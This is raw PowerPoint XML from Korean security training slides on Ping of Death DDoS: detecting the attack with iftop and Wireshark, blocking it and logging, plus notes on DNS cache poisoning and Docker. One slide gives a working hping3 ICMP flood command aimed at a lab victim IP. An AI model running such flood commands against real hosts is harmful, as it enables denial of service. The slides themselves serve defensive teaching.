        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6440922" y="4741753"/>
            <a:ext cx="1516507" cy="305689"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4A0B6A-B8C6-4BA4-AA37-F16B407F0089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2365999737"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6210742" y="5127703"/>
          <a:ext cx="5328158" cy="736346"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3378860283"/>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49152761"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437896">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="172720" marR="0" indent="-17272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질의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랜덤 값이 사용되더라도 공격을 반복적으로 수행함으로써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캐시 오염을 성공시킬 수도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2100375"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81D5CEE9-902B-4C5B-83D1-A4BA74074FB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="6028002"/>
            <a:ext cx="5616792" cy="460175"/>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입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325303933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bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>종료</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killall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> named</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4) bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> named</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33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A8E4306-90D9-4823-A00F-E0C0BBF1BB63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="815521" y="989087"/>
            <a:ext cx="1782826" cy="284226"/>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404509093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/Training/Unit/Net/13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 13. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Ping of Death</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(ICMP Request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대용량의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data</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Fragment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단위로 분할시켜 송신하고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대상이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data</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수신하고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Fragment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재조합 할 때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CPU</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과부하 현상이 나타나게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en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>PoD</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탐지하고 대응할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9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Victim(CentOS 6.4 / 10.10.1.101)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3198267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125253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 hping3 --icmp --rand-source 10.10.1.101 -d 65000 --flood</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392122" y="1810512"/>
            <a:ext cx="5616792" cy="4675628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># acheck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(* history –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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145" name="_x247861960">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE5B1772-AE20-40D4-AB99-B8FEFF46C4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737616"/>
            <a:ext cx="5400675" cy="512763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6147" name="_x247861800">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68957771-1FAD-43FE-890B-8B609D17DC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832" y="2414016"/>
            <a:ext cx="4008438"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88961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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 교관공격 버튼 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Setup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180" y="4096256"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="화살표: 오른쪽 14">
            <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00733412-9AE5-4585-8405-12AC612CE9B3}"/>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69" name="_x247862600">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D1841E6-EA38-474D-9DB2-C49CFA51FD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063" y="890016"/>
            <a:ext cx="5400675" cy="144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521518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/Training/Unit/Net/13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 13. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Ping of Death</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Ping of Death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받고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iftop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Wireshark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확인 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차단하고 로그 기록을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남기시오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en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>PoD</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9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Victim(CentOS 6.4 / 10.10.1.101)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1468F5E4-2EBF-4951-ADA0-008B174065B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4635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a:t> Docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="화살표: 오른쪽 15">
            <a:hlinkClick r:id="rId2"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Docker란 무엇인가? 도커에 대해 알아보기">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{157871A0-BD99-4F79-9135-B41728133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50" y="1756038"/>
            <a:ext cx="9410700" cy="3648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797178-EEC7-409E-9520-CB7B128B6477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033670" y="5478449"/>
            <a:ext cx="10602691"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>Linux® </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>컨테이너를 만들고 사용할 수 있도록 하는 컨테이너화 기술</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>컨테이너는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>레벨의 가상화로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>프로세스를 격리시켜 동작하는 방식</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>성능향상</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>뛰어난 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>이식성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>쉽게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>Scale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>Out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>을 할 수 있는 유연성</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="그룹 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{175E1C10-04AA-41D5-ABD9-943E6475F6CA}"/>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1EB686B-1407-4FB7-9A0F-F448DA9B6E9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7CF75B89-FD60-459F-A09A-1AB0DC1ADC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FA9951FD-01D9-4017-9FC7-DCBFF1C54F3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055535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[setup]</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>탐지 항목</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격서버에서 희생자서버로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ping of Death </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격시도</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 트래픽 양 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>희생자서버에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷 분석</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷을 분석해보면 패킷이 너무 커서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>여러개로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 분할된 것 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- ICMP Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷 분석</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>헤더 분석 후 페이로드 크기 값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dirty="0" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iftop</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TX : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>전송 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ RX : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>수신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ TOTAL : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>전체 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>cumm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 후 현재까지의 총 데이터 양 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ peak : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>피크시의 데이터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ rates : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>각각 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>초</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>초</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>초의 평균흐름 </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3" name="_x247860040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A40277F5-C572-4F58-BE6E-FEC242BB57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731520"/>
            <a:ext cx="5400675" cy="14446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822884C2-FCB7-47B3-9010-2F92A756233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pic>
        <p:nvPicPr>
          <p:cNvPr id="8195" name="_x247862040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A32AC6-4452-49F0-9A6E-7C4AA6CC76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1036" y="896112"/>
            <a:ext cx="2003425" cy="1905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47863320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14467215-CB03-4782-97E3-9A1EB557CD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1207008"/>
            <a:ext cx="5400675" cy="3059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106333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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ipv4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷으로 쪼개져 들어오는 것을 확인 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Reassembled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
